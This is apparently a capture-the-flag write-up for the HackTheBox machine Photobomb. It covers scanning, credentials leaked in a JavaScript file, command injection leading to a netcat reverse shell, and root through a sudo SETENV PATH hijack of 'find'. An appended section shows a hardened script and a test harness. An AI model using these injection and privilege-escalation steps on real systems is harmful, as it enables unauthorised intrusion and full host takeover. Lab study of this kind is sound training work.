Photobomb | HackTheBox | Machine

Enumeration

Nmap

nmap -sV -sC <target ip>
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 10:47 EST
Nmap scan report for 10.10.11.182
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.36 seconds

Let's see port 80.

[screenshot: port 80]

By inspecting the page source we find photobomb.js.

[screenshot: view page source]

Let's see what's in photobomb.js.

[screenshot: pass-link]

It contains a URL with embedded credentials: http://pH0t0:b0Mb!@photobomb.htb/printer

Using those credentials we are now logged in as pH0t0.

[screenshot: download image]

We can see that we can download the images. Let's intercept that request using Burp Suite.

[screenshot: burp-intercept--download]

Looking at the intercepted request, we can see that its parameters can be used for command injection.

Let's try a reverse shell; https://revshells.com/ can generate one.

[screenshot: payload]

It's important to URL-encode the payload.

[screenshot: encode-payload]

[screenshot: shell-getting-burp]

we got a reverse shell!

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.182
wizard@photobomb:~/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
wizard@photobomb:~/photobomb$ hostname -I
10.10.11.182 dead:beef::250:56ff:feb9:240a 
wizard@photobomb:~/photobomb$ cat ../user.txt 
c00**************************1d8
wizard@photobomb:~/photobomb$

Privilege Escalation

Looking at the sudoers entry we can see that we can run a script as root, and the SETENV tag also lets us set environment variables for it.

wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
    secure_path=/usr/local/bin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$

Looking at the script we can see that it calls find by its bare name rather than an absolute path, so the binary is resolved through PATH.

wizard@photobomb:~$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
wizard@photobomb:~$

We can take advantage of the fact that we can change variables like PATH so that the script picks up a custom find command of ours, and in the context of sudo that find will run as root.

Congratulations!

This is the command that gives you root privileges: sudo PATH=$PWD:$PATH /opt/cleanup.sh

wizard@photobomb:~$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:~# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:~# hostname -I
10.10.11.182 dead:beef::250:56ff:feb9:240a 
root@photobomb:~# cat /root/root.txt 
344**************************a18
root@photobomb:~#
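As an added example (not code from the original post or from the Photobomb box), here is the weak pattern from /opt/cleanup.sh beside a hardened version, with a small harness that shows a caller-supplied PATH no longer decides which find runs. The function names, the scratch directory and the decoy find are constructed for the demonstration; the other half of the fix, dropping SETENV from the sudoers rule, is noted in the comments.

```shell
#!/bin/sh
# Added example (not the box's or the author's code). The cleanup script
# resolves `find` through PATH while sudo's SETENV tag lets the caller
# choose that PATH. The hardened variant pins PATH inside the script and
# calls every external binary by absolute path, so the caller's PATH is
# irrelevant. Both variants take the working directory as $1.

# Weak variant: mirrors the last line of /opt/cleanup.sh. Whichever `find`
# is first on PATH gets executed, with the script's privileges.
cleanup_weak() {
    base="$1"
    cd "$base" || return 1
    find source_images -type f -name '*.jpg' -exec chown root:root {} \;
}

# Hardened variant: PATH is reset and binaries are referenced absolutely.
# Pair this with a sudoers rule without SETENV, e.g.
#   wizard ALL=(root) NOPASSWD: /opt/cleanup.sh
# so the caller cannot pass environment variables at all.
cleanup_hardened() {
    base="$1"
    PATH=/usr/sbin:/usr/bin:/sbin:/bin
    export PATH
    cd "$base" || return 1
    /usr/bin/find source_images -type f -name '*.jpg' -exec /bin/chown root:root {} \;
}

# Build a constructed scratch tree: an empty source_images directory (no
# .jpg, so chown is never invoked and the run works without root) and a
# decoy `find` that only records that it was called.
setup_scratch() {
    scratch=$(mktemp -d)
    mkdir -p "$scratch/source_images" "$scratch/bin"
    cat > "$scratch/bin/find" <<'EOF'
#!/bin/sh
# Decoy: proves it ran by touching a marker file next to itself.
touch "$(dirname "$0")/decoy_ran"
EOF
    chmod +x "$scratch/bin/find"
    printf '%s\n' "$scratch"
}

# Runs the named variant with the decoy directory prepended to PATH.
# Returns 0 if the decoy `find` was executed, 1 if the real one ran.
decoy_ran() {
    variant="$1"
    scratch=$(setup_scratch)
    ( PATH="$scratch/bin:$PATH"; export PATH; "$variant" "$scratch" ) >/dev/null 2>&1 || true
    if [ -e "$scratch/bin/decoy_ran" ]; then rc=0; else rc=1; fi
    rm -rf "$scratch"
    return $rc
}

# Stand-alone run: report which variant the decoy managed to hijack.
if decoy_ran cleanup_weak; then echo "weak:     decoy find executed"; else echo "weak:     real find executed"; fi
if decoy_ran cleanup_hardened; then echo "hardened: decoy find executed"; else echo "hardened: real find executed"; fi
```

The harness only checks which binary was resolved; the chown step never runs because the scratch tree holds no .jpg files. In a real deployment the absolute-path change and the removal of SETENV belong together: pinning PATH inside the script protects it even if the sudoers rule is later loosened again, and removing SETENV closes the same hole for any other command the script resolves by name.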
This post is licensed under CC BY 4.0 by the author.
